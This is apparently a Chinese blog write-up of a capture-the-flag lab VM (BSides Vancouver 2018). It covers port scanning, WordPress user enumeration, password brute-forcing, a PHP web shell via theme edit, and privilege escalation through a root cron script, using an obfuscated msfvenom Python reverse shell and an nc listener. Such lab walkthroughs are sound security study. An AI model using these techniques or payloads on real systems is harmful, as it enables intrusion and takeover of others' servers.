标签:server AD复制 需要 收集 scala robots vmnet mod entry
nmap -T4 192.168.7.1/24 -A
Nmap scan report for 192.168.7.128
Host is up (0.00040s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 17:52 public
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
| 2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_ 256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (2 hosts up) scanned in 16.54 seconds
从上面可以看到服务器开放了21端口,对应的是FTP服务,还是可以匿名访问的。
浏览器服务:ftp://192.168.7.128/public/users.txt.bk
还开放了80端口,robots.txt里有一个/backup_wordpress
目录
很明显式一个WordPress,直接上wpscan扫一下
wpscan --url http://192.168.7.128/backup_wordpress/ --enumerate
[+] WordPress theme in use: twentysixteen - v1.2
[+] Name: twentysixteen - v1.2
| Last updated: 2018-05-17T00:00:00.000Z
| Location: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/
| Readme: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/readme.txt
[!] The version is out of date, the latest version is 1.5
| Style URL: http://192.168.7.128/backup_wordpress/wp-content/themes/twentysixteen/style.css
| Referenced style.css: wp-content/themes/twentysixteen/style.css
| Theme Name: Twenty Sixteen
| Theme URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating usernames ...
[+] We identified the following 2 users:
+----+-------+------+
| ID | Login | Name |
+----+-------+------+
| 1 | admin | admi |
| 2 | john | joh |
+----+-------+------+
[!] Default first WordPress username 'admin' is still used
其实很多漏洞都是XSS或其他需要管理员交互的漏洞,所以很难利用。这里收集到的有博客用的主题,管理员的用户名为john,在博客写的也可以看出来。
wpscan --url http://192.168.7.128/backup_wordpress/ --username john --wordlist dic.txt
得到密码是enigma
登录改主题的404.php,getshell后发现没有root权限。
获取任务定时计划cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root /usr/local/bin/cleanup
在这可以看到有一个用root权限运行的cleanup的脚本。
先生成反弹shell的payload
kali-team@LTS:~$ sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.7.1 lport=4444 R
[sudo] kali-team 的密码:
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 601 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICAgLCAgICAgICAgIHN1YnByb2Nlc3MgICAgICwgICAgICAgICBvcyAgICAgOyAgICAgICBob3N0PSIxOTIuMTY4LjcuMSIgICAgIDsgICAgICAgcG9ydD00NDQ0ICAgICA7ICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgICAgLCAgICAgICAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgIDsgICAgICAgcy5jb25uZWN0KChob3N0ICAgICAsICAgICAgICAgcG9ydCkpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDApICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDEpICAgICA7ICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAgLCAgICAgICAgIDIpICAgICA7ICAgICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
nc -lvp 4444
kali-team@LTS:~$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.7.128] port 4444 [tcp/*] accepted (family 2, sport 51156)
ls
flag.txt
id
uid=0(root) gid=0(root) groups=0(root)
cat flag.txt
Congratulations!
If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!
There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?
@abatchy17
CTF-BSides Vancouver: 2018 (Workshop)
标签:server AD复制 需要 收集 scala robots vmnet mod entry
原文地址:https://www.cnblogs.com/Kali-Team/p/12210980.html